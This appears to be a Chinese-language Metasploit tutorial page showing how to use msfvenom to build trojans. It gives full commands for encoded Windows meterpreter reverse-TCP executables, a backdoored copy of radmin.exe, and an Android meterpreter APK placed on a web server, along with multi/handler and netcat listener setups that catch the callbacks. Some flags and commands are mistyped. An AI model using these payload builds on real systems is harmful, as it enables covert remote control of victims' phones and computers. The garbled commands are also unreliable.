6.Metasploit生成apk攻击Android实例

Metasploit进阶第四讲生成Android apk文件

01 msfvenom基本参数

msfvenom介绍

承接上回，staged/unstage payload如何利用？

msfvenom是msfpayload及msfencode的结合体，可利用msfvenom将payload封装为木马程序，并在目标机上执行，在本地监听上线。

msfvenom基本参数

msfvenom -h

-p ->指定payload

-1 ->列出所有可用项

-f ->指定文件输出格式

-e ->指定编码格式

-a ->选择架构平台

-o ->选择文件输出路径，包含文件名

-s ->指定生成的payload最大大小

-b ->避免使用的字符

-I ->指定编码次数

-c ->添加自己的shellcode

-xxxx.exc -k ->捆绑文件到xxx.cxc

以下使用msfvenom分别是什么意思？

Msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545

-e x86/shikata_ga_nai –I 3 –f exe -o abc.exe

Msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545

-b ‘\×00xff' –I 3 –f exe -o abc.exe

Msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545

-e x86/shikata_ga_nai –k –x /usr/share/windows-binaries/radmin.exe –f exe -o radmin.exe

msfvenom生成apk文件

staged payload：

msfvenom -p android/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545

R>/var/www/html/Lliang.apk

metasploit：

use exploit/multi/handler 加载模块

set payload android/meterpreter/reverse_tcp 选择Payload

set LHOST10.1.1.169这里的地址设置成我

们刚配置木马的IP地址

set LPORT4545这里的端口设置成刚才我们

配置木马所监听的端口

unstage payload：

msfvenom –p windows/shell_reverse_tcp LHOST=10.1.1.169 LPORT=4545

-f exe –o /var/www/html/shell-stageless.exe

metasploit：

use exploit/multi/handler加载模块

set payload windows/shell_reverse_tcp 选择Payload

unstage payload：

msfvenom -p windows/shell reverse_tcp LHOST=10.1.1.169 LPORT=4545 -f exe -o /var/www/html/shell-stageless.exe

netcat：在两台电脑之润建立链接并返回两个数据流

nc -lyp 4545 -监听4545端口

-v/-vw 显示指令执行过程

-l 使用监听模式，管控传入的资料

-p 设置本地主机使用的通信端口

staged payload不适用于netcat，必须使用Metasploit的exploit/multi/handler模块。要从主机上的metasploit handler上下载完整的payload

巴特西

6.Metasploit生成apk攻击Android实例

最新文章

热门文章